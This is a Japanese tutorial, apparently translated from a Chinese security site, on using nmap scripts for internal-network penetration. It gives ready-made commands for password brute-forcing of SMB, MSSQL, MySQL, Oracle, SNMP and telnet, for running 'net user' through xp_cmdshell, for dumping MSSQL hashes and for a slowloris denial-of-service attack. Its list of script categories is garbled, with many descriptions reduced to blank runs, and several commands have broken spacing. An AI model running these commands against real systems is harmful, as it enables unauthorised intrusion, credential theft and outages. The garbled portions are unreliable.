nmapスクリプト使用概要

5686 ワード

nmapの基本的な紹介と基本的な使い方は、黒雲知識ベースですでに提出されており、詳細については、この文書では説明しません.具体的なリンク:http://drops.wooyun.org/tips/2002
本文は主にnmapの多くのスクリプトの使用を説明して、内網が浸透する時特に使いやすいです.
0 x 01 nmapスクリプト別スキャン
nmapスクリプトは主に以下のクラスに分けられ、スキャン時に必要に応じて--script=カテゴリを設定するという方法で比較的一般的なスキャンを行うことができます.
auth:         (    )     
broadcast:                , dhcp/dns/sqlserver     
brute:         ,        http/snmp   
default:   -sC -A           ,            
discovery:           , SMB  、SNMP     
dos:             
exploit:              
external:             ,    whois    
fuzzer:        ,          ,        intrusive:       ,           IDS/IPS        
malware:             、          
safe:    intrusive  ,         
version:            (Version Detection)       
vuln:                (Vulnerability),    MS08_067

部分的にスクリーンショットを使用:
(1)  nmap --script=auth 192.168.137.*
認証証明書の処理(認証を迂回)を担当するスクリプトは、検出部として弱いパスワードを適用することもできます.
(2) nmap --script=brute 192.168.137.*
暴力的な解読方法を提供する データベース、smb、snmpなどに対して簡単なパスワードの暴力的な推測を行うことができます
(3) nmap --script=default 192.168.137.*  または  nmap -sC 192.168.137.*
デフォルトのスクリプトスキャンは、主に様々なアプリケーションサービスの情報を収集し、収集した後、特定のサービスに対して攻撃を行うことができます.
(4) nmap --script=vuln 192.168.137.*     
一般的な脆弱性の有無を確認
(5) nmap -n -p445 --script=broadcast 192.168.137.4
ローカルエリアネットワーク内でより多くのサービスのオープン状況を確認
(6) nmap --script external 202.103.243.110  
サードパーティのデータベースまたはリソース、例えばwhois解析
0 x 02 nmapアプリケーションサービス別スキャン
(1)vncスキャン:
vnc bypassのチェック
1 nmap  --script=realvnc-auth-bypass 192.168.137.4  
vnc認証方式の確認
1 nmap  --script=vnc-auth  192.168.137.4  
vnc情報の取得
1 nmap  --script=vnc-info  192.168.137.4  
(2)smbスキャン:
smb解読
1 nmap  --script=smb-brute.nse 192.168.137.4  
smb辞書解読
1 nmap --script=smb-brute.nse --script-args=userdb= /var/passwd ,passdb= /var/passwd 192.168.137.4  
smbはいくつかの深刻な漏れが知られている.
1 nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4    
共有ディレクトリの表示 
1 nmap -p 445  --script smb- ls --script-args ‘share=e$,path=\,smbuser= test ,smbpass= test ’ 192.168.137.4    
ホストの機密情報をクエリーします(注意:nmap_serviceをダウンロードする必要があります)
1 nmap -p 445 -n –script=smb-psexec --script-args= smbuser= test ,smbpass= test 192.168.137.4   
セッションの表示
1 nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser= test ,smbpass= test 192.168.137.4    
システム情報
1 nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser= test ,smbpass= test 192.168.137.4  
(3)Mssqlスキャン:
mssqlユーザー名とパスワードの推測
1 nmap -p1433 --script=ms-sql-brute --script-args=userdb= /var/passwd ,passdb= /var/passwd 192.168.137.4    
xp_cmdshell実行コマンド 
1 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd= "net user" 192.168.137.4      
dumphash値
1 nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4      
(4)Mysqlスキャン:
root空パスワードのスキャン
1 nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4   
すべてのmysqlユーザーをリスト
1 nmap -p3306 --script=mysql- users .nse --script-args=mysqluser=root 192.168.137.4   
同じアプリケーションのすべてのスクリプトスキャンをサポート
1 nmap --script=mysql-* 192.168.137.4  
(5)Oracleスキャン:
oracle sidスキャン
1 nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5  
oracle弱いパスワード解読
1 nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb= /var/passwd ,passdb= /var/passwd 192.168.137.5      
(6)他の使いやすいスクリプト
nmap --script=broadcast-netbios-master-browser 192.168.137.4         
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4    rsync  
nmap --script informix-brute -p 9088 192.168.137.4    informix       
nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql    
nmap -sU --script snmp-brute 192.168.137.4            snmp    
nmap -sV --script=telnet-brute 192.168.137.4          telnet    
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}'   jboss autopwn  
nmap --script=http-methods.nse 192.168.137.4   http    
nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos  ,                 'half-HTTP' connections   
nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

(7)頼りにならないシナリオ:
vnc-brute    回数が多くなると接続が禁止されます
pcanywhere-brute   同上
0x03  学会スクリプト解析
nmapではスクリプトがわかりにくいわけではありませんので、使用時に原理が分からなければ利用スクリプトを直接見ることもできますし、その中のいくつかのパラメータを修正して自分で使うこともできます.
例:
Oracleの弱いパスワードの解読について:
呼び出しプロシージャ:oracle-brute.nse>>oracle-default-accounts.lst
まず、解読スクリプトを呼び出します.
スクリプト内の辞書の場所に応じてデフォルトの辞書を表示します.もちろん、解読した文字を自分で追加したり、スクリプトやパラメータを変更して解読辞書を変更したりすることもできます.